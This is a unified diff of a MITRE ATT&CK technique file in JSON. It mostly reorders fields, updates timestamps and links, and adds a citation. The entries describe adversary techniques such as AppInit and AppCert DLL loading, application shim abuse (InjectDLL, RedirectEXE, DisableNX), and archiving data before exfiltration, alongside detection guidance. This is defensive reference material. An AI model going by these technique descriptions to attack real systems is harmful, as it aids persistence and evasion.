- "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_effective_permissions": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41",
@@ -898,28 +907,28 @@
],
"modified": "2020-03-24T20:34:09.996Z",
"created": "2020-01-24T14:52:25.589Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Secure boot disabled on systems running Windows 8 and later"
],
+ "x_mitre_effective_permissions": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
"x_mitre_data_sources": [
"Windows Registry",
"Process command-line parameters",
"Process monitoring",
"Loaded DLLs"
],
- "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_effective_permissions": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_system_requirements": [
- "Secure boot disabled on systems running Windows 8 and later"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b",
@@ -931,14 +940,14 @@
"url": "https://attack.mitre.org/techniques/T1155"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/",
"description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.",
"source_name": "Macro Malware Targets Macs"
}
],
"revoked": true,
"type": "attack-pattern",
- "modified": "2020-03-09T14:09:08.637Z",
+ "modified": "2020-04-14T13:26:00.846Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -954,7 +963,7 @@
"description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020."
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/macro-malware-targets-macs/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/",
"description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.",
"source_name": "Macro Malware Targets Macs"
}
@@ -973,21 +982,21 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T16:44:34.580Z",
+ "modified": "2020-04-14T13:28:17.696Z",
"created": "2020-03-09T14:07:54.329Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -1072,9 +1081,15 @@
],
"modified": "2020-03-23T20:24:52.899Z",
"created": "2020-01-30T17:37:22.261Z",
- "x_mitre_platforms": [
- "Office 365",
- "SaaS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
+ ],
+ "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
+ "x_mitre_data_sources": [
+ "Office 365 audit logs",
+ "OAuth audit logs"
],
"x_mitre_contributors": [
"Shailesh Tiwary (Indian Army)",
@@ -1082,16 +1097,10 @@
"Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
"Mark Wee"
],
- "x_mitre_data_sources": [
- "Office 365 audit logs",
- "OAuth audit logs"
- ],
- "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Office 365",
+ "SaaS"
+ ]
},
{
"external_references": [
@@ -1147,6 +1156,20 @@
],
"modified": "2020-03-29T02:01:10.832Z",
"created": "2020-02-20T15:35:00.025Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
+ "x_mitre_data_sources": [
+ "Network device logs",
+ "Network device logs",
+ "Network intrusion detection system",
+ "Web application firewall logs",
+ "Web logs",
+ "SSL/TLS inspection"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1157,26 +1180,22 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Network device logs",
- "Network device logs",
- "Network intrusion detection system",
- "Web application firewall logs",
- "Web logs",
- "SSL/TLS inspection"
- ],
- "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:56.776Z",
+ "modified": "2020-03-27T19:02:44.772Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Application Layer Protocol",
+ "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
"external_references": [
{
"source_name": "mitre-attack",
@@ -1189,19 +1208,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
- "name": "Application Layer Protocol",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-27T19:02:44.772Z",
- "created": "2017-05-31T21:30:56.776Z",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
@@ -1257,6 +1266,11 @@
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"source_name": "Endgame Process Injection July 2017"
},
+ {
+ "source_name": "FireEye Application Shimming",
+ "url": "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf",
+ "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020."
+ },
{
"url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf",
"description": "Pierce, Sean. (2015, November). Defending Against Malicious Application Compatibility Shims. Retrieved June 22, 2017.",
@@ -1268,7 +1282,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Application Shimming",
- "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. 
However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
+ "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. 
However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
"id": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -1281,22 +1295,22 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-24T21:28:29.648Z",
+ "modified": "2020-05-04T19:05:30.140Z",
"created": "2020-01-24T14:56:24.231Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Windows Registry"
],
- "x_mitre_detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
@@ -1322,21 +1336,21 @@
],
"modified": "2020-03-26T15:44:27.068Z",
"created": "2017-05-31T21:30:24.512Z",
- "x_mitre_version": "1.1",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_data_sources": [
- "API monitoring",
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "User"
],
"x_mitre_platforms": [
"macOS",
"Windows"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_data_sources": [
+ "API monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -1367,6 +1381,19 @@
],
"modified": "2020-03-29T02:07:27.508Z",
"created": "2020-02-20T15:37:27.052Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
+ "x_mitre_detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
+ "x_mitre_data_sources": [
+ "Network device logs",
+ "Network intrusion detection system",
+ "Web application firewall logs",
+ "Web logs",
+ "SSL/TLS inspection"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1377,22 +1404,25 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Network device logs",
- "Network intrusion detection system",
- "Web application firewall logs",
- "Web logs",
- "SSL/TLS inspection"
- ],
- "x_mitre_detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.",
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ ]
},
{
+ "created": "2020-02-20T20:53:45.725Z",
+ "modified": "2020-03-29T18:27:31.040Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
+ "name": "Archive Collected Data",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -1405,22 +1435,6 @@
"source_name": "Wikipedia File Header Signatures"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Archive Collected Data",
- "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
- "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-29T18:27:31.040Z",
- "created": "2020-02-20T20:53:45.725Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1437,6 +1451,22 @@
"x_mitre_version": "1.0"
},
{
+ "created": "2020-02-20T21:09:55.995Z",
+ "modified": "2020-03-25T22:48:14.605Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
+ "name": "Archive via Custom Method",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -1449,22 +1479,6 @@
"source_name": "ESET Sednit Part 2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Archive via Custom Method",
- "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
- "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-25T22:48:14.605Z",
- "created": "2020-02-20T21:09:55.995Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -1518,18 +1532,18 @@
],
"modified": "2020-03-29T18:27:30.891Z",
"created": "2020-02-20T21:08:52.529Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -1575,20 +1589,20 @@
],
"modified": "2020-03-25T21:54:37.374Z",
"created": "2020-02-20T21:01:25.428Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"File monitoring",
"Binary file metadata"
],
- "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -1629,11 +1643,9 @@
],
"modified": "2020-03-30T00:37:16.593Z",
"created": "2020-03-16T15:48:33.882Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
@@ -1641,9 +1653,11 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -1696,21 +1710,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-23T13:20:55.893Z",
+ "modified": "2020-06-20T22:17:05.394Z",
"created": "2020-01-14T01:29:43.786Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Anti-virus"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"Process monitoring",
"API monitoring"
],
- "x_mitre_defense_bypassed": [
- "Process whitelisting",
- "Anti-virus"
+ "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -1750,17 +1764,17 @@
],
"modified": "2020-03-23T22:35:13.112Z",
"created": "2019-12-03T12:59:36.749Z",
- "x_mitre_platforms": [
- "Linux"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": true,
+ "x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring"
],
